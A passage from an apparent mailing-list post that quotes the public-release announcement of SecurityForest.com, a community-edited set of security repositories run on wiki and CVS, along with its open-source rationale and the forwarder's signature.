 security repositories that are categorized for practical reasons. The
 technologies currently in use in these repositories are based on Wiki
 technology and CVS (Concurrent Versioning System) technology. Depending on
 the species of the tree - the suitable technology will be used.
 SecurityForest.com is a collection of repositories (trees) for the
 community - by the community. In other words - the updating, modifying and
 improving can be done by anyone in the community. This public release is
 posted at
 http://www.securityforest.com/wiki/index.php?title=SecurityForest_-_Public_Release_no.1

 The Open Source Idea
 ====================
 The basic idea behind Open Source is very simple: When people can read,
 modify and improve a piece of software, the software evolves. People
 improve it, people adapt it, people fix bugs. And this can happen at a
 speed that, if one is used to the slow pace of conventional development,
 seems astonishing. We at SecurityForest have learned that this rapid
 evolutionary process produces better results than the traditional closed
 model, in which only very few people improve the Security Repositories and
 everybody else must use what these individuals have come across and added.
 SecurityForest is not only based on OpenSource software, but itself is
 opensource meaning the updating, modifying and improving can be done by
 anyone in the community.

 Trees in the Forest
 SNIP

-- 
Gregory A. Gilliss, CISSP                 E-mail: [EMAIL PROTECTED]
Computer Security                         WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3